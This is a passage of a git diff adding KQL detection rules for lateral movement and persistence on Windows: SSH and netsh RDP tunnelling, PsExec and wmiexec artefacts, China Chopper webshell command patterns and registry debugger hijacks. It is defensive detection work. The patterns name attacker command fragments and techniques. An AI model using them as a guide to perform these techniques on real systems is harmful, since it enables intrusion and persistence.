Remote Desktop Tunneling +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021 + +DeviceProcessEvents +| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql new file mode 100644 index 00000000..2af67c7b --- /dev/null +++ b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql @@ -0,0 +1,12 @@ +// Title: Privilege Escalation via Named Pipe Impersonation +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021 +// False Positives: +// - Other programs that cause these patterns (please report) + +DeviceProcessEvents +| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql new file mode 100644 index 00000000..02bac7ad --- /dev/null +++ b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql @@ -0,0 +1,12 @@ +// Title: PSEXEC Remote Execution File Artefact +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-21 +// Level: high +// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql new file mode 100644 index 00000000..889509a6 --- /dev/null +++ b/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: RDP Port Forwarding Rule Added Via Netsh.EXE +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2019-01-29 +// Level: high +// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql new file mode 100644 index 00000000..d82633f6 --- /dev/null +++ b/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 Execution Without Parameters +// Author: Bartlomiej Czyz, Relativity +// Date: 2021-01-31 +// Level: high +// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 +// False Positives: +// - False positives may occur if a user called rundll32 from CLI with no options + +DeviceProcessEvents +| where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql new file mode 100644 index 00000000..271a9cbf --- /dev/null +++ b/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Csi.exe Usage +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-17 +// Level: medium +// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage by software developers + +DeviceProcessEvents +| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql new file mode 100644 index 00000000..7dc91359 --- /dev/null +++ b/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql @@ -0,0 +1,10 @@ +// Title: Suspicious RDP Redirect Using TSCON +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-17 +// Level: high +// Description: Detects a suspicious RDP session redirect using tscon.exe +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002 + +DeviceProcessEvents +| where ProcessCommandLine contains " /dest:rdp-tcp#" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql new file mode 100644 index 00000000..38e1b84c --- /dev/null +++ b/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql @@ -0,0 +1,10 @@ +// Title: Suspicious SysAidServer Child +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-26 +// Level: medium +// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210 + +DeviceProcessEvents +| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql new file mode 100644 index 00000000..0fd38a29 --- /dev/null +++ b/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious UltraVNC Execution +// Author: Bhabesh Raj +// Date: 2022-03-04 +// Level: high +// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql new file mode 100644 index 00000000..642e7576 --- /dev/null +++ b/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Windows Admin Share Mount Via Net.EXE +// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga +// Date: 2020-10-05 +// Level: medium +// Description: Detects when an admin share is mounted using net.exe +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 +// False Positives: +// - Administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql new file mode 100644 index 00000000..1658894f --- /dev/null +++ b/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql @@ -0,0 +1,10 @@ +// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-21 +// Level: high +// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql new file mode 100644 index 00000000..b32fbc80 --- /dev/null +++ b/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Windows Share Mount Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-02 +// Level: low +// Description: Detects when a share is mounted using the "net.exe" utility +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 +// False Positives: +// - Legitimate activity by administrators and scripts + +DeviceProcessEvents +| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql new file mode 100644 index 00000000..bf99d8de --- /dev/null +++ b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql @@ -0,0 +1,14 @@ +// Title: Winrs Local Command Execution +// Author: Liran Ravich, Nasreddine Bencherchali +// Date: 2025-10-22 +// Level: high +// Description: Detects the execution of Winrs.exe where it is used to execute commands locally. +Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement. + +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (ProcessCommandLine contains "-r:localhost" or ProcessCommandLine contains "/r:localhost" or ProcessCommandLine contains "–r:localhost" or ProcessCommandLine contains "—r:localhost" or ProcessCommandLine contains "―r:localhost" or ProcessCommandLine contains "-r:127.0.0.1" or ProcessCommandLine contains "/r:127.0.0.1" or ProcessCommandLine contains "–r:127.0.0.1" or ProcessCommandLine contains "—r:127.0.0.1" or ProcessCommandLine contains "―r:127.0.0.1" or ProcessCommandLine contains "-r:[::1]" or ProcessCommandLine contains "/r:[::1]" or ProcessCommandLine contains "–r:[::1]" or ProcessCommandLine contains "—r:[::1]" or ProcessCommandLine contains "―r:[::1]" or ProcessCommandLine contains "-remote:localhost" or ProcessCommandLine contains "/remote:localhost" or ProcessCommandLine contains "–remote:localhost" or ProcessCommandLine contains "—remote:localhost" or ProcessCommandLine contains "―remote:localhost" or ProcessCommandLine contains "-remote:127.0.0.1" or ProcessCommandLine contains "/remote:127.0.0.1" or ProcessCommandLine contains "–remote:127.0.0.1" or ProcessCommandLine contains "—remote:127.0.0.1" or ProcessCommandLine contains "―remote:127.0.0.1" or ProcessCommandLine contains "-remote:[::1]" or ProcessCommandLine contains "/remote:[::1]" or ProcessCommandLine contains "–remote:[::1]" or ProcessCommandLine contains "—remote:[::1]" or ProcessCommandLine contains "―remote:[::1]")) or ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (not((ProcessCommandLine contains "-r:" or ProcessCommandLine contains "/r:" or ProcessCommandLine contains "–r:" or ProcessCommandLine contains "—r:" or ProcessCommandLine contains "―r:" or ProcessCommandLine contains "-remote:" or ProcessCommandLine contains "/remote:" or ProcessCommandLine contains "–remote:" or ProcessCommandLine contains "—remote:" or ProcessCommandLine contains "―remote:")))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql new file mode 100644 index 00000000..572e0532 --- /dev/null +++ b/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql @@ -0,0 +1,13 @@ +// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-09-02 +// Level: medium +// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003 +// False Positives: +// - Legitimate event consumers +// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button + +DeviceImageLoadEvents +| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql new file mode 100644 index 00000000..03ff0711 --- /dev/null +++ b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql @@ -0,0 +1,12 @@ +// Title: Wmiexec Default Output File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-02 +// Level: critical +// Description: Detects the creation of the default output filename used by the wmiexec tool +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.execution, attack.t1047 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$" \ No newline at end of file diff --git a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql new file mode 100644 index 00000000..6c6dcc17 --- /dev/null +++ b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql @@ -0,0 +1,12 @@ +// Title: Abuse of Service Permissions to Hide Services Via Set-Service +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: high +// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 +// False Positives: +// - Rare intended use of hidden services + +DeviceProcessEvents +| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD") \ No newline at end of file diff --git a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql new file mode 100644 index 00000000..ed568d7c --- /dev/null +++ b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql @@ -0,0 +1,10 @@ +// Title: Activate Suppression of Windows Security Center Notifications +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress" \ No newline at end of file diff --git a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql new file mode 100644 index 00000000..e3f8d755 --- /dev/null +++ b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql @@ -0,0 +1,12 @@ +// Title: Add Debugger Entry To AeDebug For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines + +DeviceRegistryEvents +| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p")) \ No newline at end of file diff --git a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql new file mode 100644 index 00000000..88024939 --- /dev/null +++ b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql @@ -0,0 +1,12 @@ +// Title: Add Debugger Entry To Hangs Key For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - This value is not set by default but could be rarly used by administrators + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger" \ No newline at end of file diff --git a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql new file mode 100644 index 00000000..8768d399 --- /dev/null +++ b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql @@ -0,0 +1,10 @@ +// Title: Add DisallowRun Execution to Registry +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set DisallowRun to 1 to prevent user running specific computer program +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun" \ No newline at end of file diff --git a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql new file mode 100644 index 00000000..387f4a93 --- /dev/null +++ b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql @@ -0,0 +1,12 @@ +// Title: Allow RDP Remote Assistance Feature +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of the feature (alerts should be investigated either way) + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp" \ No newline at end of file diff --git a/KQL/rules/Persistence/change_the_fax_dll.kql b/KQL/rules/Persistence/change_the_fax_dll.kql new file mode 100644 index 00000000..1ed01153 --- /dev/null +++ b/KQL/rules/Persistence/change_the_fax_dll.kql @@ -0,0 +1,10 @@ +// Title: Change the Fax Dll +// Author: frack113 +// Date: 2022-07-17 +// Level: high +// Description: Detect possible persistence using Fax DLL load when service restart +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll")) \ No newline at end of file diff --git a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql new file mode 100644 index 00000000..0a510014 --- /dev/null +++ b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql @@ -0,0 +1,10 @@ +// Title: Change User Account Associated with the FAX Service +// Author: frack113 +// Date: 2022-07-17 +// Level: high +// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService")) \ No newline at end of file diff --git a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql new file mode 100644 index 00000000..c9f272f5 --- /dev/null +++ b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql @@ -0,0 +1,10 @@ +// Title: Chopper Webshell Process Pattern +// Author: Florian Roth (Nextron Systems), MSTI (query) +// Date: 2022-10-01 +// Level: high +// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 + +DeviceProcessEvents +| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql new file mode 100644 index 00000000..e9c0a017 --- /dev/null +++ b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql @@ -0,0 +1,12 @@ +// Title: Chromium Browser Instance Executed With Custom Extension +// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) +// Date: 2022-06-19 +// Level: medium +// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1176.001 +// False Positives: +// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert + +DeviceProcessEvents +| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql new file mode 100644 index 00000000..474eef12 --- /dev/null +++ b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql @@ -0,0 +1,12 @@ +// Title: ClickOnce Trust Prompt Tampering +// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate internal requirements. + +DeviceRegistryEvents +| where RegistryValueData =~ "Enabled" and RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel*" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites") \ No newline at end of file diff --git a/KQL/rules/Persistence/com_hijack_via_sdclt.kql b/KQL/rules/Persistence/com_hijack_via_sdclt.kql new file mode 100644 index 00000000..b08432c8 --- /dev/null +++ b/KQL/rules/Persistence/com_hijack_via_sdclt.kql @@ -0,0 +1,10 @@ +// Title: COM Hijack via Sdclt +// Author: Omkar Gudhate +// Date: 2020-09-27 +// Level: high +// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548 + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute" \ No newline at end of file diff --git a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql new file mode 100644 index 00000000..191ccce8 --- /dev/null +++ b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql @@ -0,0 +1,10 @@ +// Title: Communication To Uncommon Destination Ports +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: medium +// Description: Detects programs that connect to uncommon destination ports +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents +| where (RemotePort in~ ("8080", "8888")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql new file mode 100644 index 00000000..17b2e4c6 --- /dev/null +++ b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql @@ -0,0 +1,12 @@ +// Title: CrashControl CrashDump Disabled +// Author: Tobias Michalski (Nextron Systems) +// Date: 2022-02-24 +// Level: medium +// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112 +// False Positives: +// - Legitimate disabling of crashdumps + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\CrashControl" \ No newline at end of file diff --git a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql new file mode 100644 index 00000000..318b3b95 --- /dev/null +++ b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql @@ -0,0 +1,10 @@ +// Title: Creation of a Local Hidden User Account by Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-05-03 +// Level: high +// Description: Sysmon registry detection of a local hidden user account. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 + +DeviceRegistryEvents +| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$" \ No newline at end of file diff --git a/KQL/rules/Persistence/creation_of_a_local_user_account.kql b/KQL/rules/Persistence/creation_of_a_local_user_account.kql new file mode 100644 index 00000000..2d44ba9d --- /dev/null +++ b/KQL/rules/Persistence/creation_of_a_local_user_account.kql @@ -0,0 +1,12 @@ +// Title: Creation Of A Local User Account +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-06 +// Level: low +// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. +// MITRE Tactic: Persistence +// Tags: attack.t1136.001, attack.persistence +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "create" and FolderPath endswith "/dscl") or (ProcessCommandLine contains "addUser" and FolderPath endswith "/sysadminctl") \ No newline at end of file diff --git a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql new file mode 100644 index 00000000..a66f52c7 --- /dev/null +++ b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql @@ -0,0 +1,12 @@ +// Title: Disable Internal Tools or Feature in Registry +// Author: frack113, Nasreddine Bencherchali (Nextron Systems), 